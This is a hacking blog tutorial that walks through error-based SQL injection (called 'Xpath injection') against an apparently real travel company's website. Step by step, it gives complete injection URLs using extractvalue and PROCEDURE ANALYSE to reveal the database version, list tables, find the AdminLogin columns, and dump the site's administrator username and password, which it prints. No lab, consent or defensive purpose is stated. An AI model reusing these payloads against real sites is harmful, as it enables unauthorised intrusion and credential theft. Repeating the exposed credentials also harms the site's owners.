Welcome back to TechynHacky!!
I am Asman and Today I will show you How To Dump All Data In One Shot In Xpath Injection.
So Lets starts :-)
Here Is our Test site!! :)
""http://www.latintourdimensions.com/overview/product_detail.php?id=352""
First Found Xpath Vulnerablity Using
+and+extractvalue()--
Website will Respond this!
[Incorrect parameter count in the call to native function 'extractvalue']
It means Website Is Vulnerable To XPATH Extractvalue Injection.!!
Okay Now Next Step :-)
Now Lets Find The Database & Version Of Database.
Here we will use this Query!
+Procedure Analyse+(extractvalue(0,concat(0x27,0x426c61436b526f7365,0x3a,@@version,database())),1) -- -
Our Website With Query will look like this!!
http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,0x426c61436b526f7365,0x3a,@@version,database())),1) -- -
Website will responce something like this :-)
[XPATH syntax error: ''BlaCkRose:5.1.54-log:LTD']
In Simple Injection We Can't Extract Database, Version, & Table, Columns, In Single Query
Okay So Now We Need Tables Of Website..
So Here is our next Query!!
+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+substr(group_concat(table_name),10,50)+from+information_schema.tables+where+table_schema=database()))),1)-- -
Using This Query We Can Extract All Tables Of Website From Database.
Website will look like this with query!!
http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+substr(group_concat(table_name),10,50)+from+information_schema.tables+where+table_schema=database()))),1)-- -
Website Responce
[XPATH syntax error: ''s,AdminLogin,Agencia,Agente,Bro']
Now We Need Columns Of Table AdminLogin,
So Lets Start!!!
Next Query!!
+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(column_name)+from+information_schema.columns+where+table_name=TABLE HEX))),1)-- -
[AdminLogin] is a Weak Table In Database,
Okay Now Convert AdminLogin into HEX Format using online tools like!!
hex.online-toolz.com/tools/text-hex-convertor.php
and Yes also if you are Using Hackbar then just Click On [Encoding > HEX Encoding > String To 00ff00ff]
Type AdminLogin In the PoP-Up Window And Hit Enter!!
and Use Hex Format In Query Like This [0xHEX FORMAT OF THE TABLE]
Website with Query will look like this!!
http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(column_name)+from+information_schema.columns+where+table_name=0x41646d696e4c6f67696e))),1)-- -
Website Responding this!!
[XPATH syntax error: ''id,usuario,passw']
[usuario, passw,] are Weak Columns In Table AdminLogin,
So our Next Query will be this!!
+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(column1,0x7e,column2)+from+TABLE_NAME))),1)-- -
Now replace!
TABLE_NAME = AdminLogin
COLUMN1 = usuario
COLUMN2 = passw
Now our website with Query will look like this!!
http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(usuario,0x7e,passw)+from+AdminLogin))),1)-- -
Website is respondin this!!
XPATH syntax error: ''admin~admin'
Here we got our things!! :-D
and We are Done.. :-P
Thanks for reading and Visiting :-P
No comments:
Post a Comment